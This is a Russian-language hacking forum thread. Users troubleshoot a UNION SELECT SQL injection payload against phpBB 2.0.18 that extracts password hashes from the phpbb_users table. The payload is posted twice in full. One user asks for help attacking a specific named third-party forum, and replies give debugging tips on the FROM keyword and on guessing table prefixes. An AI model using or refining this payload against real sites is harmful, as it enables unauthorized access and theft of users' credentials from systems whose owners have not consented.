Я хотел бы узнать почему не получается провести sql injection,понимаю мембер ачата уже должен наизусть выучить все это и с этим у него не должно быть никаких проблем,но у мя возникли (может из за моей невнимательности). Вот код index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=айди юзера/* я нашел форум и решил попробовать на нем,как всегда у мя ничего не вышло =).Он после запроса выкидавал выкидывал на гшлавнубю страницу форума,то есть ни хеша ничего мне не выдает.Кстати форум на движке phpbb 2.0.18. Спасибо за помощь.Не ругайтесь пожалуйста.=)
У меня так всё работает... Code: index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=[тут id]/* ЗЫ чё-то как-то пробелы сами добавляются....
он меня так же выкидывает на index.php.Ничего не происходит. ты имеешь ввиду у тя таким образом все получается?
успокойся,если не хочешь чтоб я был в мемберах так и скажи =) Насчет вопроса - получается что профиксили?
тогда вот форум который мне интересен http://www.wow.wnet.ua/new_forum/ посомтрите если не трудно,я почти все о нем узнал,но ни какие уязвимости не проходят,помогите. Пожалуйста.
Да я против тебя не чегон е имею просто ыт так гвооришь как будто дибил какой то. Вот и отвечаю что не все мемберы знают что воще это такое.
2 Lord Nikon - если ты используешь именно тот запрос, который запостил здесь то служебное слово FROM записано неверно - убери в нем пробел.
Lord Nikon, префикс совсем не обязательно phpbb_. Хотя этот префикс в пхпбб по умолчанию. Ещё например phpbb2_ часто бывает. Хотя толковый админ ни тот не другой не поставит. Кто хорошо разбирается в пхпбб, следит за безопасностью, прекрасно знает об sql inj. Только мягко говоря неопытные админы оставят этот префикс. По крайней мере все сайты поддержки пхпбб и наши и забугорные давным давно всем втолковывают - меняйте префиксы. Тем более что делается это элементарно одним запросом. Это так сказать основа безопасности. Удивляюсь, что у кого-то старые префиксы остаются. Совсем лохи наверно. У них наверно и других уязвимостей полно.